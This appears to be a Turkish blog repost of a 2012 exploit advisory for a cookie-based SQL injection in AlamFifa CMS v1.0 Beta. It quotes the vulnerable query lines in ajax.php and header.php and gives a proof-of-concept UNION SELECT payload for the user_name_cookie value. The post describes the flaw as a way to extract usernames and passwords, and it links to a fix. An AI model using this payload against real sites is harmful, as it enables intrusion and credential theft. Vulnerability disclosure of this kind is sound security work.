AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability açığı sayesinde username ve password ve user_pass_cookie leri çekmek mümkün.
açığa ilişkin açıklamalar
_________________
############################################
### Exploit Title: AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability
### Date: 30/9/2012
### Author: L0n3ly-H34rT
### Contact:
### My Site: http://se3c.blogspot.com/
### Vendor Link: http://www.traidnt.net/vb/traidnt2143253/
### Software Link: http://www.alamrb.com/images/up/15-08-2012-19-15-45-17314.zip
### Version: 1.0
### Tested on: Linux/Windows
############################################
# Files affected :
- ( ajax.php ) on line 6:
$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));
- ( /files/header.php ) on line 34 :
$usersql = mysql_query("SELECT * FROM bgs_users WHERE name = '".$_COOKIE['user_name_cookie']."' and pass = '".md5($_COOKIE['user_pass_cookie'])."'")or die(error_sql(mysql_error(),__LINE__,__FILE__));
# user_name_cookie is affected in cookie ..
# P.0.C :
http://127.0.0.1/alamfifa1/index.php
- Inject the cookie by any tool like this :
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;
############################################
# You can fix it here :
http://www.traidnt.net/vb/traidnt2143253-2/#post19292739
# Greetz to my friendz
Bir önceki yazımız olan İnternet Explorer tüm sürümlerinde Açık başlıklı makalemizde Açıklar sayesinde yüksek yetkiler alınarak pc ler ele geçiriliyor, İnternet Explorerde yeni güvenlik açıkları ve Microsoft internet ayarlarının yüksek olarak işaretlenmesini istiyor hakkında bilgiler verilmektedir.
شكرا لكم مع تحياتي